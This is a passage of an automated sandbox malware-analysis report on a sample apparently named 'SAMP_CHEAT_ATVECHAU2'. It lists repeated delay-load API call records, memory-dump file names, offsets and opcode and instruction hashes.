                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 382734549a0be2f1c249e431f7582f215d2b62427562ec04fba6a69ed7183b2d
                                                    • Instruction ID: 56df35c17dd2c99ea2ae6a4779d1652eb7e998db56ef9009459867d9bc7c0a18
                                                    • Opcode Fuzzy Hash: 382734549a0be2f1c249e431f7582f215d2b62427562ec04fba6a69ed7183b2d
                                                    • Instruction Fuzzy Hash: 33B012F2268210BC710491096C02E3B030DC0C1F23330D82EFC1CC11C0D8408E0C0473
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E580
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: f936bd8902d31435c408c5d5783549bc9fce021b3d497983e8491846570d2759
                                                    • Instruction ID: baf07ce0b497f9972122ca47199bc691be137ad8aceb89c30224c74a31fa1ca2
                                                    • Opcode Fuzzy Hash: f936bd8902d31435c408c5d5783549bc9fce021b3d497983e8491846570d2759
                                                    • Instruction Fuzzy Hash: BBB012C226D5207E710852743C0AE3B030DC0C0B163309D2EFC4CC11C0E8404C0C0471
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E580
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 4a7ca635eebd4ee77e12f927aa31dc8aee5a8ba98447f4c795802be2104385d5
                                                    • Instruction ID: f4e00bfac8e17441ae5e45dd82931a02e528082b9e0dd4ea28f0235c274b5db3
                                                    • Opcode Fuzzy Hash: 4a7ca635eebd4ee77e12f927aa31dc8aee5a8ba98447f4c795802be2104385d5
                                                    • Instruction Fuzzy Hash: D1B012C226D6207C714851647C0BE3B031DC0D0B163309F2EFC4CC11C0EC405C4C0471
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E580
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: f59a2af2022f2b3bc81e6624c5f28072c95c9beed00734c99b0dd80d5c3643f9
                                                    • Instruction ID: 4f2152dd692d7b25b5021bb517429a4d5ba086ae312ed6b8e27be252d80b2d6e
                                                    • Opcode Fuzzy Hash: f59a2af2022f2b3bc81e6624c5f28072c95c9beed00734c99b0dd80d5c3643f9
                                                    • Instruction Fuzzy Hash: A3B012C226D5207C750851647D0AE3B031DC0D0B163309F2EFC4CC11C0EC404D1D0471
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E51F
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: f04a8934d79d990259eecc4a83ccbee060bc296fae1efbf763d80d7522aae519
                                                    • Instruction ID: 3314136b4c87352dd02f1dab8e160755a54f57a8a2c27526200ee662a09dcd7b
                                                    • Opcode Fuzzy Hash: f04a8934d79d990259eecc4a83ccbee060bc296fae1efbf763d80d7522aae519
                                                    • Instruction Fuzzy Hash: 16B092822686007C620451086C06E3A0209C0C5B163309A2AB808C11C0A8405C480471
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E51F
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: fc868c8965e30ac039ff4b1e08a6ba4fb631aa4f402643fc890d2532379382ae
                                                    • Instruction ID: 0fd4bb5b2b17c45413186431cd99384d65b4839b9fcf8a35abbb2c41fb5861c2
                                                    • Opcode Fuzzy Hash: fc868c8965e30ac039ff4b1e08a6ba4fb631aa4f402643fc890d2532379382ae
                                                    • Instruction Fuzzy Hash: 35B012C32685007C710411282C0AE3F030DC0C1F163309C3FFC58C14C1A8404D0C0471
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E51F
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 70e37f72834bf39b04955a801c3c61f0141950f62c14a5389dc6b976d52f4ffb
                                                    • Instruction ID: e0ba01846caddeb4d2bf08555e9f1bfeaa0b69827ae4fe0aa847b64f71040fd2
                                                    • Opcode Fuzzy Hash: 70e37f72834bf39b04955a801c3c61f0141950f62c14a5389dc6b976d52f4ffb
                                                    • Instruction Fuzzy Hash: 9EB012C22685007E7104510C2C06F3F030DC0C5F163309C2FFC0CC11C0E8404C080471
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E51F
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: cd8a476f415976b4c5b396298c966588d4b707729b46c5d86a792d740757f372
                                                    • Instruction ID: b80b2dd7e0395e481f9fe08ffaad3b8cc09630dd8117fed883e8aa87137662f3
                                                    • Opcode Fuzzy Hash: cd8a476f415976b4c5b396298c966588d4b707729b46c5d86a792d740757f372
                                                    • Instruction Fuzzy Hash: 0BB012C22685407D7144510C2D06E3F470DC0C5F16330DC2FFC0CC11C0E8404C090471
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E1E3
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 89d55373ba214efb284a48f4c8bb4a1b00d6da8002eff466ed0f86f230f856da
                                                    • Instruction ID: 285da4e9c01fbdd70e73737f25e3acefa37dfd57172c691e63b3708a3eb8bd5e
                                                    • Opcode Fuzzy Hash: 89d55373ba214efb284a48f4c8bb4a1b00d6da8002eff466ed0f86f230f856da
                                                    • Instruction Fuzzy Hash: 30A001E6AAD652BCB109A2526D06E3B031DC4D5B653319D2EF86AC44C1A8A0AC4918B2
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E1E3
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                     • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 5a923cacb46d752f724ecbd071027de559e6b00777fe6cc1a244e0a87b7f3bf7
                                                    • Instruction ID: 285da4e9c01fbdd70e73737f25e3acefa37dfd57172c691e63b3708a3eb8bd5e
                                                    • Opcode Fuzzy Hash: 5a923cacb46d752f724ecbd071027de559e6b00777fe6cc1a244e0a87b7f3bf7
                                                    • Instruction Fuzzy Hash: 30A001E6AAD652BCB109A2526D06E3B031DC4D5B653319D2EF86AC44C1A8A0AC4918B2
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E1E3
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                     • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: a20981827d560458f83cecc6569edbec2685e37246b2e166817db663e22bd6e1
                                                    • Instruction ID: 285da4e9c01fbdd70e73737f25e3acefa37dfd57172c691e63b3708a3eb8bd5e
                                                    • Opcode Fuzzy Hash: a20981827d560458f83cecc6569edbec2685e37246b2e166817db663e22bd6e1
                                                    • Instruction Fuzzy Hash: 30A001E6AAD652BCB109A2526D06E3B031DC4D5B653319D2EF86AC44C1A8A0AC4918B2
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E1E3
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                     • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 1f3732c55258669f9efb94e76c97a1c43369f0f8a3762a02356f7a83619c57f8
                                                    • Instruction ID: 285da4e9c01fbdd70e73737f25e3acefa37dfd57172c691e63b3708a3eb8bd5e
                                                    • Opcode Fuzzy Hash: 1f3732c55258669f9efb94e76c97a1c43369f0f8a3762a02356f7a83619c57f8
                                                    • Instruction Fuzzy Hash: 30A001E6AAD652BCB109A2526D06E3B031DC4D5B653319D2EF86AC44C1A8A0AC4918B2
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E1E3
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                     • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: b4511174bb127f0e517ffaef944be12a30ec52d43d9a4b96339821d6e3bbe2ae
                                                    • Instruction ID: 285da4e9c01fbdd70e73737f25e3acefa37dfd57172c691e63b3708a3eb8bd5e
                                                    • Opcode Fuzzy Hash: b4511174bb127f0e517ffaef944be12a30ec52d43d9a4b96339821d6e3bbe2ae
                                                    • Instruction Fuzzy Hash: 30A001E6AAD652BCB109A2526D06E3B031DC4D5B653319D2EF86AC44C1A8A0AC4918B2
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E1E3
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                     • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 57aa539534825db0fa61bcff381c6be4bce3a16901559cf40773c85351621fc0
                                                    • Instruction ID: 285da4e9c01fbdd70e73737f25e3acefa37dfd57172c691e63b3708a3eb8bd5e
                                                    • Opcode Fuzzy Hash: 57aa539534825db0fa61bcff381c6be4bce3a16901559cf40773c85351621fc0
                                                    • Instruction Fuzzy Hash: 30A001E6AAD652BCB109A2526D06E3B031DC4D5B653319D2EF86AC44C1A8A0AC4918B2
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E1E3
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                     • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 9096e2e4961989eda81322ef97b1b1cad92f55a963c52e76d2a4f6bfc7f6822e
                                                    • Instruction ID: 285da4e9c01fbdd70e73737f25e3acefa37dfd57172c691e63b3708a3eb8bd5e
                                                    • Opcode Fuzzy Hash: 9096e2e4961989eda81322ef97b1b1cad92f55a963c52e76d2a4f6bfc7f6822e
                                                    • Instruction Fuzzy Hash: 30A001E6AAD652BCB109A2526D06E3B031DC4D5B653319D2EF86AC44C1A8A0AC4918B2
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E1E3
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                     • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
